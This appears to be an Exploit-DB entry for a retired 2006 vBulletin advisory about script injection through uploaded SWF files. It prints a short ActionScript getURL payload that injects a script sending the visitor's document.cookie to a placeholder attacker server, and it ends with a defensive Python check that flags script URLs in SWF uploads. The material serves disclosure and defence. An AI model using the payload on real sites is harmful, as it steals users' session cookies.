vendor: vBulletin
by: SecurityFocus
N/A
CVSS
N/A
Remote Script Injection
None
CWE
Product Name: vBulletin
Affected Version From: None
Affected Version To: None
Patch Exists: NO
Related CWE: None
CPE: None
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

vBulletin Remote Script Injection Vulnerability

vBulletin is prone to a vulnerability that may let remote attackers inject arbitrary script code into the application. If exploited, this vulnerability may let attackers steal cookie-based authentication credentials. Other attacks are also possible. The ability to upload SWF files must be enabled by site administrators to expose this issue.

Mitigation:

Note that the ability to upload SWF files is disabled by default, and must be enabled by site administrators to expose this issue.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/21736/info

vBulletin is prone to a vulnerability that may let remote attackers inject arbitrary script code into the application.

If exploited, this vulnerability may let attackers steal cookie-based authentication credentials. Other attacks are also possible.

Update: Note that the ability to upload SWF files is disabled by default, and must be enabled by site administrators to expose this issue.

This BID is being retired because further information shows that the application is not vulnerable to this issue.

getURL("javascript:function blab(){}var scriptNode = 
+document.createElement('script');document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='javascript';scriptNode.src='http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie
+;blab();");
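
An upload-side check for the pattern in the snippet above, added here as an example (it is not part of the advisory or of vBulletin): it inflates a SWF upload if needed and flags literal javascript: or vbscript: URLs of the kind passed to getURL(). The function names, the MAX_BODY limit and the sample bytes are assumptions; the sample is a constructed header plus one ActionGetURL record, not a playable movie.

```python
import struct
import zlib

SCRIPT_SCHEMES = (b"javascript:", b"vbscript:")  # schemes that run script via getURL()
MAX_BODY = 16 * 1024 * 1024  # cap on inflated size (assumed limit)

def swf_body(data: bytes) -> bytes:
    """Return the SWF body after the 8-byte header, inflating CWS files."""
    if len(data) >= 8 and data[:3] == b"FWS":
        return data[8:]
    if len(data) >= 8 and data[:3] == b"CWS":
        inflater = zlib.decompressobj()
        try:
            body = inflater.decompress(data[8:], MAX_BODY)
        except zlib.error as exc:
            raise ValueError("corrupt zlib stream") from exc
        if inflater.unconsumed_tail:
            raise ValueError("inflated body exceeds cap")
        return body
    raise ValueError("not an FWS/CWS file")

def script_urls(data: bytes) -> list:
    """Return each NUL-terminated string run that begins at a script scheme."""
    body = swf_body(data)
    lowered = body.lower()
    hits = []
    for scheme in SCRIPT_SCHEMES:
        pos = lowered.find(scheme)
        while pos != -1:
            end = body.find(b"\x00", pos)
            end = len(body) if end == -1 else end
            hits.append(body[pos:end].decode("latin-1"))
            pos = lowered.find(scheme, end)
    return hits

def should_reject(data: bytes) -> bool:
    """Reject an upload claimed to be SWF if unparsable or carrying a script URL."""
    try:
        return bool(script_urls(data))
    except ValueError:
        return True

def make_sample(url: bytes, compressed: bool) -> bytes:
    """Constructed input: SWF header plus one ActionGetURL (0x83) record."""
    payload = url + b"\x00_self\x00"
    body = b"\x83" + struct.pack("<H", len(payload)) + payload
    size = struct.pack("<I", 8 + len(body))
    return (b"CWS\x07" + size + zlib.compress(body)) if compressed else (b"FWS\x07" + size + body)
```

A literal match is a heuristic: ActionScript that assembles the URL at run time will not be caught, so leaving SWF uploads disabled, the default noted above, remains the stronger control.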